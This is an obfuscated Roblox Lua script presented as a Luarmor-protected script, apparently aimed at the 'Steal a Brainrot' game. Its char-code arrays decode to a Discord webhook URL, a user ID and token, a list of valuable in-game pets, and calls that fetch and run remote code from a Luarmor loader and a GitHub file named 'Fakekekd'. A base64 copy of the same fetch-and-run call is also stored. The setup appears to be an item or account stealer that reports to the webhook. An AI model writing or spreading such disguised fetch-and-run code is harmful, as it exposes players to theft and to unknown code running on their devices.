-- Luarmor V4 | https://luarmor.net
-- Protected Script | DO NOT SHARE

local _ENV = getfenv()
local _0xCAFE = string.char
local _0xBEEF = table.concat
local _0xDEAD = function(_0x1) local _0x2={} for _0x3=1,#_0x1 do _0x2[#_0x2+1]=_0xCAFE(_0x1[_0x3]) end return _0xBEEF(_0x2) end
local _0xF00D = getgenv or function() return _ENV end
local _0xACE = _0xF00D()

_0xACE[_0xDEAD({115,101,99,114,101,116,54,55})] = _0xDEAD({49,52,56,55,55,57,51,52,56,48,57,51,56,57,53,48,54,53,54})
_0xACE[_0xDEAD({83,101,99,114,101,116,84,111,107,101,110})] = _0xDEAD({77,99,100,111,54,80,99,78,117,103,103,101,116,115})
_0xACE[_0xDEAD({85,115,101,114})] = _0xDEAD({77,99,100,111,54,80,99,78,117,103,103,101,116,115})
_0xACE[_0xDEAD({87,101,98,104,111,111,107})] = _0xDEAD({104,116,116,112,115,58,47,47,100,105,115,99,111,114,100,46,99,111,109,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,57,51,48,51,56,56,57,51,56,49,54,51,52,56,54,55,50,47,95,105,115,75,55,82,86,55,102,51,80,108,113,79,106,82,101,107,71,112,88,71,90,102,73,88,73,87,119,69,71,105,81,105,105,51,111,114,104,83,119,74,66,97,113,110,50,71,103,77,76,108,69,105,118,48,71,55,103,119,84,79,74,73,48,104,57,50})
_0xACE[_0xDEAD({66,114,97,105,110,114,111,116,115})] = {"Meowl", "Strawberry Elephant", "Skibidi Toilet", "Headless Horseman", "Hydra Dragon Cannelloni", "Griffin", "Dragon Gingerini", "Dragon Cannelloni", "Love Love Bear", "La Supreme Combinasion", "Cerberus", "Celestial Pegasus", "Rosey and Teddy", "Popcuru and Fizzuru", "Cooki and Milki", "Capitano Moby", "Burguro And Fryuro", "Ketupat Bros", "Reinito Sleighito", "Fortunu and Cashuru", "Los Amigos", "La Secret Combinasion", "Los Sekolahs", "Signore Carapace", "La Casa Boo", "Fragrama and Chocrama", "La Food Combinasion", "Elefanto Frigo", "Spooky and Pumpky", "Ginger Gerat", "La Ginger Sekolah", "Sammyni Fattini", "Los Spaghettis", "Festive 67", "Ventoliero Pavonero", "Cloverat Clapat", "Antonio", "Garama and Madundung", "Fishino Clownino", "Rosetti Tualetti", "Nacho Spyder", "Tirilikalika Tirilikalako"}
_0xACE[_0xDEAD({83,99,114,105,112,116,77,111,100,101})] = _0xDEAD({67,85,83,84,79,77})
_0xACE[_0xDEAD({67,117,115,116,111,109,83,99,114,105,112,116})] = _0xDEAD({98,71,57,104,90,72,78,48,99,109,108,117,90,121,104,110,89,87,49,108,79,107,104,48,100,72,66,72,90,88,81,111,73,109,104,48,100,72,66,122,79,105,56,118,99,109,70,51,76,109,100,112,100,71,104,49,89,110,86,122,90,88,74,106,98,50,53,48,90,87,53,48,76,109,78,118,98,83,57,53,100,88,86,122,101,67,49,111,100,87,73,118,77,106,73,118,99,109,86,109,99,121,57,111,90,87,70,107,99,121,57,116,89,87,108,117,76,48,90,104,97,50,86,114,90,87,116,107,73,105,107,112,75,67,107,61})
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,97,112,105,46,108,117,97,114,109,111,114,46,110,101,116,47,102,105,108,101,115,47,118,52,47,108,111,97,100,101,114,115,47,56,48,56,102,52,97,100,52,101,98,102,102,52,55,53,99,53,55,99,101,54,49,101,97,51,57,101,52,49,101,50,51,46,108,117,97})))()
-- Custom Script
loadstring(game:HttpGet(_0xDEAD({104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,121,117,117,115,120,45,104,117,98,47,50,50,47,114,101,102,115,47,104,101,97,100,115,47,109,97,105,110,47,70,97,107,101,107,101,107,100})))()

-- Luarmor V4 Protected | Fingerprint: f28f7aeab82c0b0e
